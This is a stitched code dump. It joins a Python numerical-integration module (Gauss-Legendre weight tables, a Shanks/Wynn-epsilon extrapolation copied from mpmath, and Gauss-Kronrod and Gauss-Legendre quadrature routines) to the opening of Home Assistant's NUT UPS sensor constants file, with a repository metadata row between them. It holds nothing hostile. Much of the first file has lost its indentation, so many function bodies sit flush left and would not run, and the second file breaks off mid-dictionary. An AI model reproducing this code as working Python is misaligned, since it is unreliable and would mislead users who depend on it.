[ -0.6005453046616810234696382, 0.1287539625393362276755158],
[ -0.4645707413759609457172671, 0.1426067021736066117757461],
[ -0.3165640999636298319901173, 0.1527660420658596667788554],
[ -0.1603586456402253758680961, 0.1589688433939543476499564],
[ 0, 0.1610544498487836959791636],
[ 0.1603586456402253758680961, 0.1589688433939543476499564],
[ 0.3165640999636298319901173, 0.1527660420658596667788554],
[ 0.4645707413759609457172671, 0.1426067021736066117757461],
[ 0.6005453046616810234696382, 0.1287539625393362276755158],
[ 0.7209661773352293786170959, 0.1115666455473339947160239],
[ 0.8227146565371428249789225, 0.0914900216224499994644621],
[ 0.9031559036148179016426609, 0.0690445427376412265807083],
[ 0.9602081521348300308527788, 0.0448142267656996003328382],
[ 0.9924068438435844031890177, 0.0194617882297264770363120]],
dtype=float),
20: np.array(
[[-0.9931285991850949247861224, 0.0176140071391521183118620],
[ -0.9639719272779137912676661, 0.0406014298003869413310400],
[ -0.9122344282513259058677524, 0.0626720483341090635695065],
[ -0.8391169718222188233945291, 0.0832767415767047487247581],
[ -0.7463319064601507926143051, 0.1019301198172404350367501],
[ -0.6360536807265150254528367, 0.1181945319615184173123774],
[ -0.5108670019508270980043641, 0.1316886384491766268984945],
[ -0.3737060887154195606725482, 0.1420961093183820513292983],
[ -0.2277858511416450780804962, 0.1491729864726037467878287],
[ -0.0765265211334973337546404, 0.1527533871307258506980843],
[ 0.0765265211334973337546404, 0.1527533871307258506980843],
[ 0.2277858511416450780804962, 0.1491729864726037467878287],
[ 0.3737060887154195606725482, 0.1420961093183820513292983],
[ 0.5108670019508270980043641, 0.1316886384491766268984945],
[ 0.6360536807265150254528367, 0.1181945319615184173123774],
[ 0.7463319064601507926143051, 0.1019301198172404350367501],
[ 0.8391169718222188233945291, 0.0832767415767047487247581],
[ 0.9122344282513259058677524, 0.0626720483341090635695065],
[ 0.9639719272779137912676661, 0.0406014298003869413310400],
[ 0.9931285991850949247861224, 0.0176140071391521183118620]],
dtype=float),
32: np.array(
[[-0.9972638618494815635449811, 0.0070186100094700966004071],
[ -0.9856115115452683354001750, 0.0162743947309056706051706],
[ -0.9647622555875064307738119, 0.0253920653092620594557526],
[ -0.9349060759377396891709191, 0.0342738629130214331026877],
[ -0.8963211557660521239653072, 0.0428358980222266806568786],
[ -0.8493676137325699701336930, 0.0509980592623761761961632],
[ -0.7944837959679424069630973, 0.0586840934785355471452836],
[ -0.7321821187402896803874267, 0.0658222227763618468376501],
[ -0.6630442669302152009751152, 0.0723457941088485062253994],
[ -0.5877157572407623290407455, 0.0781938957870703064717409],
[ -0.5068999089322293900237475, 0.0833119242269467552221991],
[ -0.4213512761306353453641194, 0.0876520930044038111427715],
[ -0.3318686022821276497799168, 0.0911738786957638847128686],
[ -0.2392873622521370745446032, 0.0938443990808045656391802],
[ -0.1444719615827964934851864, 0.0956387200792748594190820],
[ -0.0483076656877383162348126, 0.0965400885147278005667648],
[ 0.0483076656877383162348126, 0.0965400885147278005667648],
[ 0.1444719615827964934851864, 0.0956387200792748594190820],
[ 0.2392873622521370745446032, 0.0938443990808045656391802],
[ 0.3318686022821276497799168, 0.0911738786957638847128686],
[ 0.4213512761306353453641194, 0.0876520930044038111427715],
[ 0.5068999089322293900237475, 0.0833119242269467552221991],
[ 0.5877157572407623290407455, 0.0781938957870703064717409],
[ 0.6630442669302152009751152, 0.0723457941088485062253994],
[ 0.7321821187402896803874267, 0.0658222227763618468376501],
[ 0.7944837959679424069630973, 0.0586840934785355471452836],
[ 0.8493676137325699701336930, 0.0509980592623761761961632],
[ 0.8963211557660521239653072, 0.0428358980222266806568786],
[ 0.9349060759377396891709191, 0.0342738629130214331026877],
[ 0.9647622555875064307738119, 0.0253920653092620594557526],
[ 0.9856115115452683354001750, 0.0162743947309056706051706],
[ 0.9972638618494815635449811, 0.0070186100094700966004071]],
dtype=float),
64: np.array(
[[-0.9993050417357721394569056, 0.0017832807216964329472961],
[ -0.9963401167719552793469245, 0.0041470332605624676352875],
[ -0.9910133714767443207393824, 0.0065044579689783628561174],
[ -0.9833362538846259569312993, 0.0088467598263639477230309],
[ -0.9733268277899109637418535, 0.0111681394601311288185905],
[ -0.9610087996520537189186141, 0.0134630478967186425980608],
[ -0.9464113748584028160624815, 0.0157260304760247193219660],
[ -0.9295691721319395758214902, 0.0179517157756973430850453],
[ -0.9105221370785028057563807, 0.0201348231535302093723403],
[ -0.8893154459951141058534040, 0.0222701738083832541592983],
[ -0.8659993981540928197607834, 0.0243527025687108733381776],
[ -0.8406292962525803627516915, 0.0263774697150546586716918],
[ -0.8132653151227975597419233, 0.0283396726142594832275113],
[ -0.7839723589433414076102205, 0.0302346570724024788679741],
[ -0.7528199072605318966118638, 0.0320579283548515535854675],
[ -0.7198818501716108268489402, 0.0338051618371416093915655],
[ -0.6852363130542332425635584, 0.0354722132568823838106931],
[ -0.6489654712546573398577612, 0.0370551285402400460404151],
[ -0.6111553551723932502488530, 0.0385501531786156291289625],
[ -0.5718956462026340342838781, 0.0399537411327203413866569],
[ -0.5312794640198945456580139, 0.0412625632426235286101563],
[ -0.4894031457070529574785263, 0.0424735151236535890073398],
[ -0.4463660172534640879849477, 0.0435837245293234533768279],
[ -0.4022701579639916036957668, 0.0445905581637565630601347],
[ -0.3572201583376681159504426, 0.0454916279274181444797710],
[ -0.3113228719902109561575127, 0.0462847965813144172959532],
[ -0.2646871622087674163739642, 0.0469681828162100173253263],
[ -0.2174236437400070841496487, 0.0475401657148303086622822],
[ -0.1696444204239928180373136, 0.0479993885964583077281262],
[ -0.1214628192961205544703765, 0.0483447622348029571697695],
[ -0.0729931217877990394495429, 0.0485754674415034269347991],
[ -0.0243502926634244325089558, 0.0486909570091397203833654],
[ 0.0243502926634244325089558, 0.0486909570091397203833654],
[ 0.0729931217877990394495429, 0.0485754674415034269347991],
[ 0.1214628192961205544703765, 0.0483447622348029571697695],
[ 0.1696444204239928180373136, 0.0479993885964583077281262],
[ 0.2174236437400070841496487, 0.0475401657148303086622822],
[ 0.2646871622087674163739642, 0.0469681828162100173253263],
[ 0.3113228719902109561575127, 0.0462847965813144172959532],
[ 0.3572201583376681159504426, 0.0454916279274181444797710],
[ 0.4022701579639916036957668, 0.0445905581637565630601347],
[ 0.4463660172534640879849477, 0.0435837245293234533768279],
[ 0.4894031457070529574785263, 0.0424735151236535890073398],
[ 0.5312794640198945456580139, 0.0412625632426235286101563],
[ 0.5718956462026340342838781, 0.0399537411327203413866569],
[ 0.6111553551723932502488530, 0.0385501531786156291289625],
[ 0.6489654712546573398577612, 0.0370551285402400460404151],
[ 0.6852363130542332425635584, 0.0354722132568823838106931],
[ 0.7198818501716108268489402, 0.0338051618371416093915655],
[ 0.7528199072605318966118638, 0.0320579283548515535854675],
[ 0.7839723589433414076102205, 0.0302346570724024788679741],
[ 0.8132653151227975597419233, 0.0283396726142594832275113],
[ 0.8406292962525803627516915, 0.0263774697150546586716918],
[ 0.8659993981540928197607834, 0.0243527025687108733381776],
[ 0.8893154459951141058534040, 0.0222701738083832541592983],
[ 0.9105221370785028057563807, 0.0201348231535302093723403],
[ 0.9295691721319395758214902, 0.0179517157756973430850453],
[ 0.9464113748584028160624815, 0.0157260304760247193219660],
[ 0.9610087996520537189186141, 0.0134630478967186425980608],
[ 0.9733268277899109637418535, 0.0111681394601311288185905],
[ 0.9833362538846259569312993, 0.0088467598263639477230309],
[ 0.9910133714767443207393824, 0.0065044579689783628561174],
[ 0.9963401167719552793469245, 0.0041470332605624676352875],
[ 0.9993050417357721394569056, 0.0017832807216964329472961]],
dtype=float),
100: np.array(
[[-0.9997137267734412336782285, 0.0007346344905056717304063],
[ -0.9984919506395958184001634, 0.0017093926535181052395294],
[ -0.9962951347331251491861317, 0.0026839253715534824194396],
[ -0.9931249370374434596520099, 0.0036559612013263751823425],
[ -0.9889843952429917480044187, 0.0046244500634221193510958],
[ -0.9838775407060570154961002, 0.0055884280038655151572119],
[ -0.9778093584869182885537811, 0.0065469484508453227641521],
[ -0.9707857757637063319308979, 0.0074990732554647115788287],
[ -0.9628136542558155272936593, 0.0084438714696689714026208],
[ -0.9539007829254917428493369, 0.0093804196536944579514182],
[ -0.9440558701362559779627747, 0.0103078025748689695857821],
[ -0.9332885350430795459243337, 0.0112251140231859771172216],
[ -0.9216092981453339526669513, 0.0121314576629794974077448],
[ -0.9090295709825296904671263, 0.0130259478929715422855586],
[ -0.8955616449707269866985210, 0.0139077107037187726879541],
[ -0.8812186793850184155733168, 0.0147758845274413017688800],
[ -0.8660146884971646234107400, 0.0156296210775460027239369],
[ -0.8499645278795912842933626, 0.0164680861761452126431050],
[ -0.8330838798884008235429158, 0.0172904605683235824393442],
[ -0.8153892383391762543939888, 0.0180959407221281166643908],
[ -0.7968978923903144763895729, 0.0188837396133749045529412],
[ -0.7776279096494954756275514, 0.0196530874944353058653815],
[ -0.7575981185197071760356680, 0.0204032326462094327668389],
[ -0.7368280898020207055124277, 0.0211334421125276415426723],
[ -0.7153381175730564464599671, 0.0218430024162473863139537],
[ -0.6931491993558019659486479, 0.0225312202563362727017970],
[ -0.6702830156031410158025870, 0.0231974231852541216224889],
[ -0.6467619085141292798326303, 0.0238409602659682059625604],
[ -0.6226088602037077716041908, 0.0244612027079570527199750],
[ -0.5978474702471787212648065, 0.0250575444815795897037642],
[ -0.5725019326213811913168704, 0.0256294029102081160756420],
[ -0.5465970120650941674679943, 0.0261762192395456763423087],
[ -0.5201580198817630566468157, 0.0266974591835709626603847],
[ -0.4932107892081909335693088, 0.0271926134465768801364916],
[ -0.4657816497733580422492166, 0.0276611982207923882942042],
[ -0.4378974021720315131089780, 0.0281027556591011733176483],
[ -0.4095852916783015425288684, 0.0285168543223950979909368],
[ -0.3808729816246299567633625, 0.0289030896011252031348762],
[ -0.3517885263724217209723438, 0.0292610841106382766201190],
[ -0.3223603439005291517224766, 0.0295904880599126425117545],
[ -0.2926171880384719647375559, 0.0298909795933328309168368],
[ -0.2625881203715034791689293, 0.0301622651051691449190687],
[ -0.2323024818449739696495100, 0.0304040795264548200165079],
[ -0.2017898640957359972360489, 0.0306161865839804484964594],
[ -0.1710800805386032748875324, 0.0307983790311525904277139],
[ -0.1402031372361139732075146, 0.0309504788504909882340635],
[ -0.1091892035800611150034260, 0.0310723374275665165878102],
[ -0.0780685828134366366948174, 0.0311638356962099067838183],
[ -0.0468716824215916316149239, 0.0312248842548493577323765],
[ -0.0156289844215430828722167, 0.0312554234538633569476425],
[ 0.0156289844215430828722167, 0.0312554234538633569476425],
[ 0.0468716824215916316149239, 0.0312248842548493577323765],
[ 0.0780685828134366366948174, 0.0311638356962099067838183],
[ 0.1091892035800611150034260, 0.0310723374275665165878102],
[ 0.1402031372361139732075146, 0.0309504788504909882340635],
[ 0.1710800805386032748875324, 0.0307983790311525904277139],
[ 0.2017898640957359972360489, 0.0306161865839804484964594],
[ 0.2323024818449739696495100, 0.0304040795264548200165079],
[ 0.2625881203715034791689293, 0.0301622651051691449190687],
[ 0.2926171880384719647375559, 0.0298909795933328309168368],
[ 0.3223603439005291517224766, 0.0295904880599126425117545],
[ 0.3517885263724217209723438, 0.0292610841106382766201190],
[ 0.3808729816246299567633625, 0.0289030896011252031348762],
[ 0.4095852916783015425288684, 0.0285168543223950979909368],
[ 0.4378974021720315131089780, 0.0281027556591011733176483],
[ 0.4657816497733580422492166, 0.0276611982207923882942042],
[ 0.4932107892081909335693088, 0.0271926134465768801364916],
[ 0.5201580198817630566468157, 0.0266974591835709626603847],
[ 0.5465970120650941674679943, 0.0261762192395456763423087],
[ 0.5725019326213811913168704, 0.0256294029102081160756420],
[ 0.5978474702471787212648065, 0.0250575444815795897037642],
[ 0.6226088602037077716041908, 0.0244612027079570527199750],
[ 0.6467619085141292798326303, 0.0238409602659682059625604],
[ 0.6702830156031410158025870, 0.0231974231852541216224889],
[ 0.6931491993558019659486479, 0.0225312202563362727017970],
[ 0.7153381175730564464599671, 0.0218430024162473863139537],
[ 0.7368280898020207055124277, 0.0211334421125276415426723],
[ 0.7575981185197071760356680, 0.0204032326462094327668389],
[ 0.7776279096494954756275514, 0.0196530874944353058653815],
[ 0.7968978923903144763895729, 0.0188837396133749045529412],
[ 0.8153892383391762543939888, 0.0180959407221281166643908],
[ 0.8330838798884008235429158, 0.0172904605683235824393442],
[ 0.8499645278795912842933626, 0.0164680861761452126431050],
[ 0.8660146884971646234107400, 0.0156296210775460027239369],
[ 0.8812186793850184155733168, 0.0147758845274413017688800],
[ 0.8955616449707269866985210, 0.0139077107037187726879541],
[ 0.9090295709825296904671263, 0.0130259478929715422855586],
[ 0.9216092981453339526669513, 0.0121314576629794974077448],
[ 0.9332885350430795459243337, 0.0112251140231859771172216],
[ 0.9440558701362559779627747, 0.0103078025748689695857821],
[ 0.9539007829254917428493369, 0.0093804196536944579514182],
[ 0.9628136542558155272936593, 0.0084438714696689714026208],
[ 0.9707857757637063319308979, 0.0074990732554647115788287],
[ 0.9778093584869182885537811, 0.0065469484508453227641521],
[ 0.9838775407060570154961002, 0.0055884280038655151572119],
[ 0.9889843952429917480044187, 0.0046244500634221193510958],
[ 0.9931249370374434596520099, 0.0036559612013263751823425],
[ 0.9962951347331251491861317, 0.0026839253715534824194396],
[ 0.9984919506395958184001634, 0.0017093926535181052395294],
[ 0.9997137267734412336782285, 0.0007346344905056717304063]],
dtype=float),
}
    return weights[n][:, 0], weights[n][:, 1]
def shanks_table(seq, table=None, randomized=False):
    r'''Copied from sympy.mpmath.calculus.extrapolation.py

    This shanks function is taken almost verbatim (minus the initial ctx
    argument) from sympy.mpmath.calculus.extrapolation.py:
- http://docs.sympy.org/dev/modules/mpmath/calculus/sums_limits.html#mpmath.shanks
- https://github.com/sympy/sympy/blob/master/sympy/mpmath/calculus/extrapolation.py
mpmath is BSD license
Notes
-----
Given a list ``seq`` of the first `N` elements of a slowly
convergent infinite sequence `(A_k)`, :func:`~mpmath.shanks` computes the iterated
Shanks transformation `S(A), S(S(A)), \ldots, S^{N/2}(A)`. The Shanks
transformation often provides strong convergence acceleration,
especially if the sequence is oscillating.
The iterated Shanks transformation is computed using the Wynn
epsilon algorithm (see [1]). :func:`~mpmath.shanks` returns the full
epsilon table generated by Wynn's algorithm, which can be read
off as follows:
- The table is a list of lists forming a lower triangular matrix,
where higher row and column indices correspond to more accurate
values.
- The columns with even index hold dummy entries (required for the
computation) and the columns with odd index hold the actual
extrapolates.
- The last element in the last row is typically the most
accurate estimate of the limit.
- The difference to the third last element in the last row
provides an estimate of the approximation error.
- The magnitude of the second last element provides an estimate
of the numerical accuracy lost to cancellation.
    For convenience, the extrapolation is stopped at an odd index
    so that ``shanks(seq)[-1][-1]`` always gives an estimate of the
    limit.
Optionally, an existing table can be passed to :func:`~mpmath.shanks`.
This can be used to efficiently extend a previous computation after
new elements have been appended to the sequence. The table will
then be updated in-place.
The Shanks transformation:
The Shanks transformation is defined as follows (see [2]): given
the input sequence `(A_0, A_1, \ldots)`, the transformed sequence is
given by
.. math ::
S(A_k) = \frac{A_{k+1}A_{k-1}-A_k^2}{A_{k+1}+A_{k-1}-2 A_k}
The Shanks transformation gives the exact limit `A_{\infty}` in a
single step if `A_k = A + a q^k`. Note in particular that it
extrapolates the exact sum of a geometric series in a single step.
Applying the Shanks transformation once often improves convergence
substantially for an arbitrary sequence, but the optimal effect is
obtained by applying it iteratively:
`S(S(A_k)), S(S(S(A_k))), \ldots`.
Wynn's epsilon algorithm provides an efficient way to generate
the table of iterated Shanks transformations. It reduces the
computation of each element to essentially a single division, at
the cost of requiring dummy elements in the table. See [1] for
details.
Precision issues:
    Due to cancellation effects, the sequence must typically be
    computed at a much higher precision than the target accuracy
    of the extrapolation.
If the Shanks transformation converges to the exact limit (such
as if the sequence is a geometric series), then a division by
zero occurs. By default, :func:`~mpmath.shanks` handles this case by
terminating the iteration and returning the table it has
generated so far. With *randomized=True*, it will instead
replace the zero by a pseudorandom number close to zero.
(TODO: find a better solution to this problem.)
Examples (truncated from original)
We illustrate by applying Shanks transformation to the Leibniz
series for `\pi`:
>>> S = [4*sum((-1)**n/(2*n+1) for n in range(m))
... for m in range(1,30)]
>>>
>>> T = shanks_table(S[:7])
>>> for row in T:
... print('['+', '.join(['{:.6g}'.format(v) for v in row])+']')
...
[-0.75]
[1.25, 3.16667]
[-1.75, 3.13333, -28.75]
[2.25, 3.14524, 82.25, 3.14234]
[-2.75, 3.13968, -177.75, 3.14139, -969.938]
[3.25, 3.14271, 327.25, 3.14166, 3515.06, 3.14161]
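
    An existing table can be extended in place with more terms of the
    sequence (a minimal sketch added here, using the ``table`` argument
    described above):

    >>> T2 = shanks_table(S[:10], table=T)
    >>> len(T2)
    8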
'''
if len(seq) < 2:
raise ValueError("seq should be of minimum length 2")
if table:
START = len(table)
else:
START = 0
table = []
STOP = len(seq) - 1
if STOP & 1:
STOP -= 1
    one = 1.0  # ctx.one
    eps = np.spacing(1)  # +ctx.eps
if randomized:
from random import Random
rnd = Random()
rnd.seed(START)
for i in range(START, STOP):
row = []
for j in range(i+1):
if j == 0:
a, b = 0, seq[i+1]-seq[i]
else:
if j == 1:
a = seq[i]
else:
a = table[i-1][j-2]
b = row[j-1] - table[i-1][j-1]
if not b:
if randomized:
b = rnd.getrandbits(10)*eps
elif i & 1:
return table[:-1]
else:
return table
row.append(a + one/b)
table.append(row)
return table
def shanks(seq, ind=0):
"""Iterated Shanks transformation to accelerate series convergence
    Though normally applied to a 1d array, `shanks` will actually operate on
    the last dimension of `seq`, which allows for multi-dimensional arrays,
    e.g. for 2d data each row of `seq` would be a separate sequence.
Parameters
----------
seq : list or array
        If seq is a numpy array then its elements will be modified in-place.
If seq is a list then seq will not be modified.
ind : int, optional
Start index for extrapolation. Can be negative, e.g. ind=-5
will extrapolate based on the last 5 elements of the `seq`.
default ind=0 i.e. use all elements.
Returns
-------
out : array with 1 dim less than `seq`, or float if seq is only 1d.
Extrapolated value. If `seq` is a numpy array then due to in-place
modification the result will also be in seq[..., -1].
See Also
--------
shanks_table : Copy of sympy.mpmath.calculus.extrapolation.shanks
Provides the whole epsilon table and error estimates.
numpy.apply_along_axis : If your sequence is not in the last dimension of
an array then use np.apply_along_axis to apply it along a specific
axis.
Notes
-----
    The Shanks extrapolation is performed on the last dimension of the
    data, so for 2d data each row is treated as a separate sequence.
    For a series

    .. math:: A=\\sum_{m=0}^{\\infty}a_m

    the partial sums are first defined as

    .. math:: A_n=\\sum_{m=0}^{n}a_m

    This forms a new sequence, the convergence of which can be sped up by
    repeated use of

    .. math:: S(A_n)=\\frac{A_{n+1}A_{n-1}-A_n^2}{A_{n+1}-2A_n+A_{n-1}}
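
    Examples
    --------
    A minimal usage sketch (added here; not in the original docstring),
    accelerating the Leibniz series for pi:

    >>> S = [4 * sum((-1.0)**k / (2 * k + 1) for k in range(m))
    ...      for m in range(1, 10)]
    >>> bool(abs(shanks(S) - np.pi) < 1e-4)
    True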
"""
seq = np.atleast_1d(seq)
if ind is None:
return +seq[..., -1]
if ind < 0:
ind = seq.shape[-1] + ind
ind = max(ind, 0)
    for i in range(ind, seq.shape[-1] - 2, 2):
        denom = (seq[..., i + 2:] - 2 * seq[..., i + 1:-1] + seq[..., i:-2])
        if np.any(denom == 0):
            return +seq[..., -1]
        seq[..., i + 2:] = (
            (seq[..., i + 2:] * seq[..., i:-2] - seq[..., i + 1:-1]**2) /
            denom)
    return +seq[..., -1]
def gk_quad(f, a, b, args=(), n=10, sum_intervals=False):
"""Integration by Gauss-Kronrod quadrature between intervals
Parameters
----------
f : function or method
Function to integrate.
a, b : 1d array
Limits of integration. Must have len(a)==len(b).
args : tuple, optional
`args` will be passed to f using f(x, *args). Default args=().
    n : [7,10,15,20,25,30], optional
        Number of Gauss quadrature evaluation points. Default n=10. There
        will be 2*n+1 Kronrod quadrature points.
sum_intervals : [False, True]
        If sum_intervals=True the integrals for each a-b interval will be
        summed. Otherwise each interval integration will be returned. The
        error estimates will also be summed.
Returns
-------
igral : ndarray
Integral of f between a and b.
If sum_intervals=False then shape of igral will be (len(a), ...)
where ... corresponds to however many dimensions are returned
from f with scalar arguments. Each value in igral corresponds to
the corresponding a-b interval. If sum_intervals=True then igral will
have shape (...).
    err_estimate : ndarray same size as igral
        Estimate of the error in the integral, i.e. the absolute value of
        the fine integral minus the coarse integral.
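
    Examples
    --------
    A minimal check (added here; not in the original docstring). Integrate
    sin(x) over [0, pi], whose exact value is 2:

    >>> igral, err = gk_quad(np.sin, [0.0], [np.pi])
    >>> bool(np.isclose(igral[0], 2.0))
    True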
"""
ai = np.atleast_1d(a)
bi = np.atleast_1d(b)
xj_, wj1, wj2 = gauss_kronrod_abscissae_and_weights(n)
# dim1 = each integration limits, a and b
# dim2 = each quadrature point
ai = ai[:, np.newaxis]
bi = bi[:, np.newaxis]
xj_ = xj_[np.newaxis, :]
wj1 = wj1[np.newaxis, :]
wj2 = wj2[np.newaxis, :]
    bma = (bi - ai) / 2  # b minus a
    bpa = (ai + bi) / 2  # b plus a
    xij = bma * xj_ + bpa  # xj_ are in [-1, 1] so transform to [a, b]
    # Get the shape of f's output for a scalar argument and build an index
    # that appends any extra output dims after the quadrature axes. A tuple
    # index is used because indexing with a list of slices is removed in
    # recent numpy versions.
    extra = np.array(f(xij.flat[0], *args))
    gen_slice = tuple([slice(None)] * xij.ndim + [None] * extra.ndim)
    fij = f(xij[gen_slice], *args)
    igral1 = np.sum(bma[gen_slice] * fij * wj1[gen_slice], axis=1)
    igral2 = np.sum(bma[gen_slice] * fij * wj2[gen_slice], axis=1)
err_estimate = np.abs(igral2 - igral1)
if sum_intervals:
igral1 = np.sum(igral1, axis=0)
igral2 = np.sum(igral2, axis=0)
err_estimate = np.sum(err_estimate, axis=0)
return igral2, err_estimate
def gl_quad(f, a, b, args=(), n=10, shanks_ind=False, sum_intervals=False):
"""Integration by Gauss-Legendre quadrature with subdivided interval
Parameters
----------
f : function or method
        Function to integrate. Must accept vector arguments for x. Might
        need to use numpy.vectorize.
a, b : 1d array
limits of integration
args : tuple, optional
args will be passed to f using f(x, *args). default=()
n : [2-20, 32, 64, 100], optional
number of quadrature evaluation points. default=10
sum_intervals : [False, True]
        If sum_intervals=True the integrals for each a-b interval will be
        summed. Otherwise each interval integration will be returned.
Returns
-------
igral : ndarray
Integral of f between a and b.
If sum_intervals=False then shape of igral will be (len(a), ...)
where ... corresponds to however many dimensions are returned
from f with scalar arguments. Each value in igral corresponds to
the corresponding a-b interval. If sum_intervals=True then igral will
have shape (...).
Notes
-----
    Be careful when using large values of n; there may be precision issues.
    If f returns an ndarray when x is scalar, igral will have additional
    dimensions corresponding to those of the f-with-scalar-x output.
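
    Examples
    --------
    A minimal check (added here; not in the original docstring). Integrate
    sin(x) over [0, pi], whose exact value is 2:

    >>> bool(np.isclose(gl_quad(np.sin, 0.0, np.pi)[0], 2.0))
    True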
"""
ai = np.atleast_1d(a)
bi = np.atleast_1d(b)
xj_, wj = gauss_legendre_abscissae_and_weights(n)
# dim1 = each integration limits, a and b
# dim2 = each quadrature point
ai = ai[:, np.newaxis]
bi = bi[:, np.newaxis]
xj_ = xj_[np.newaxis, :]
wj = wj[np.newaxis, :]
    bma = (bi - ai) / 2  # b minus a
    bpa = (ai + bi) / 2  # b plus a
    xij = bma * xj_ + bpa  # xj_ are in [-1, 1] so transform to [a, b]
    # Get the shape of f's output for a scalar argument and build an index
    # that appends any extra output dims after the quadrature axes (tuple
    # index, as list-of-slices indexing is removed in recent numpy).
    extra = np.array(f(xij.flat[0], *args))
    gen_slice = tuple([slice(None)] * xij.ndim + [None] * extra.ndim)
    fij = f(xij[gen_slice], *args)
    igral = np.sum(bma[gen_slice] * fij * wj[gen_slice], axis=1)
if sum_intervals:
igral = np.sum(igral, axis=0)
return igral
| gpl-3.0 | 778,866,253,203,743,900 | 54.247768 | 131 | 0.664687 | false |
soldag/home-assistant | homeassistant/components/nut/const.py | 10 | 7810 | """The nut component."""
from homeassistant.components.sensor import (
DEVICE_CLASS_BATTERY,
DEVICE_CLASS_POWER,
DEVICE_CLASS_TEMPERATURE,
)
from homeassistant.const import (
ELECTRICAL_CURRENT_AMPERE,
ELECTRICAL_VOLT_AMPERE,
FREQUENCY_HERTZ,
PERCENTAGE,
POWER_WATT,
TEMP_CELSIUS,
TIME_SECONDS,
VOLT,
)
DOMAIN = "nut"
PLATFORMS = ["sensor"]
UNDO_UPDATE_LISTENER = "undo_update_listener"
DEFAULT_NAME = "NUT UPS"
DEFAULT_HOST = "localhost"
DEFAULT_PORT = 3493
KEY_STATUS = "ups.status"
KEY_STATUS_DISPLAY = "ups.status.display"
COORDINATOR = "coordinator"
DEFAULT_SCAN_INTERVAL = 60
PYNUT_DATA = "data"
PYNUT_UNIQUE_ID = "unique_id"
PYNUT_MANUFACTURER = "manufacturer"
PYNUT_MODEL = "model"
PYNUT_FIRMWARE = "firmware"
PYNUT_NAME = "name"
SENSOR_TYPES = {
"ups.status.display": ["Status", "", "mdi:information-outline", None],
"ups.status": ["Status Data", "", "mdi:information-outline", None],
"ups.alarm": ["Alarms", "", "mdi:alarm", None],
"ups.temperature": [
"UPS Temperature",
TEMP_CELSIUS,
"mdi:thermometer",
DEVICE_CLASS_TEMPERATURE,
],
"ups.load": ["Load", PERCENTAGE, "mdi:gauge", None],
"ups.load.high": ["Overload Setting", PERCENTAGE, "mdi:gauge", None],
"ups.id": ["System identifier", "", "mdi:information-outline", None],
"ups.delay.start": ["Load Restart Delay", TIME_SECONDS, "mdi:timer-outline", None],
"ups.delay.reboot": ["UPS Reboot Delay", TIME_SECONDS, "mdi:timer-outline", None],
"ups.delay.shutdown": [
"UPS Shutdown Delay",
TIME_SECONDS,
"mdi:timer-outline",
None,
],
"ups.timer.start": ["Load Start Timer", TIME_SECONDS, "mdi:timer-outline", None],
"ups.timer.reboot": ["Load Reboot Timer", TIME_SECONDS, "mdi:timer-outline", None],
"ups.timer.shutdown": [
"Load Shutdown Timer",
TIME_SECONDS,
"mdi:timer-outline",
None,
],
"ups.test.interval": [
"Self-Test Interval",
TIME_SECONDS,
"mdi:timer-outline",
None,
],
"ups.test.result": ["Self-Test Result", "", "mdi:information-outline", None],
"ups.test.date": ["Self-Test Date", "", "mdi:calendar", None],
"ups.display.language": ["Language", "", "mdi:information-outline", None],
"ups.contacts": ["External Contacts", "", "mdi:information-outline", None],
"ups.efficiency": ["Efficiency", PERCENTAGE, "mdi:gauge", None],
"ups.power": ["Current Apparent Power", ELECTRICAL_VOLT_AMPERE, "mdi:flash", None],
"ups.power.nominal": ["Nominal Power", ELECTRICAL_VOLT_AMPERE, "mdi:flash", None],
"ups.realpower": [
"Current Real Power",
POWER_WATT,
"mdi:flash",
DEVICE_CLASS_POWER,
],
"ups.realpower.nominal": [
"Nominal Real Power",
POWER_WATT,
"mdi:flash",
DEVICE_CLASS_POWER,
],
"ups.beeper.status": ["Beeper Status", "", "mdi:information-outline", None],
"ups.type": ["UPS Type", "", "mdi:information-outline", None],
"ups.watchdog.status": ["Watchdog Status", "", "mdi:information-outline", None],
"ups.start.auto": ["Start on AC", "", "mdi:information-outline", None],
"ups.start.battery": ["Start on Battery", "", "mdi:information-outline", None],
"ups.start.reboot": ["Reboot on Battery", "", "mdi:information-outline", None],
"ups.shutdown": ["Shutdown Ability", "", "mdi:information-outline", None],
"battery.charge": [
"Battery Charge",
PERCENTAGE,
"mdi:gauge",
DEVICE_CLASS_BATTERY,
],
"battery.charge.low": ["Low Battery Setpoint", PERCENTAGE, "mdi:gauge", None],
"battery.charge.restart": [
"Minimum Battery to Start",
PERCENTAGE,
"mdi:gauge",
None,
],
"battery.charge.warning": [
"Warning Battery Setpoint",
PERCENTAGE,
"mdi:gauge",
None,
],
"battery.charger.status": ["Charging Status", "", "mdi:information-outline", None],
"battery.voltage": ["Battery Voltage", VOLT, "mdi:flash", None],
"battery.voltage.nominal": ["Nominal Battery Voltage", VOLT, "mdi:flash", None],
"battery.voltage.low": ["Low Battery Voltage", VOLT, "mdi:flash", None],
"battery.voltage.high": ["High Battery Voltage", VOLT, "mdi:flash", None],
"battery.capacity": ["Battery Capacity", "Ah", "mdi:flash", None],
"battery.current": [
"Battery Current",
ELECTRICAL_CURRENT_AMPERE,
"mdi:flash",
None,
],
"battery.current.total": [
"Total Battery Current",
ELECTRICAL_CURRENT_AMPERE,
"mdi:flash",
None,
],
"battery.temperature": [
"Battery Temperature",
TEMP_CELSIUS,
"mdi:thermometer",
DEVICE_CLASS_TEMPERATURE,
],
"battery.runtime": ["Battery Runtime", TIME_SECONDS, "mdi:timer-outline", None],
"battery.runtime.low": [
"Low Battery Runtime",
TIME_SECONDS,
"mdi:timer-outline",
None,
],
"battery.runtime.restart": [
"Minimum Battery Runtime to Start",
TIME_SECONDS,
"mdi:timer-outline",
None,
],
"battery.alarm.threshold": [
"Battery Alarm Threshold",
"",
"mdi:information-outline",
None,
],
"battery.date": ["Battery Date", "", "mdi:calendar", None],
"battery.mfr.date": ["Battery Manuf. Date", "", "mdi:calendar", None],
"battery.packs": ["Number of Batteries", "", "mdi:information-outline", None],
"battery.packs.bad": [
"Number of Bad Batteries",
"",
"mdi:information-outline",
None,
],
"battery.type": ["Battery Chemistry", "", "mdi:information-outline", None],
"input.sensitivity": [
"Input Power Sensitivity",
"",
"mdi:information-outline",
None,
],
"input.transfer.low": ["Low Voltage Transfer", VOLT, "mdi:flash", None],
"input.transfer.high": ["High Voltage Transfer", VOLT, "mdi:flash", None],
"input.transfer.reason": [
"Voltage Transfer Reason",
"",
"mdi:information-outline",
None,
],
"input.voltage": ["Input Voltage", VOLT, "mdi:flash", None],
"input.voltage.nominal": ["Nominal Input Voltage", VOLT, "mdi:flash", None],
"input.frequency": ["Input Line Frequency", FREQUENCY_HERTZ, "mdi:flash", None],
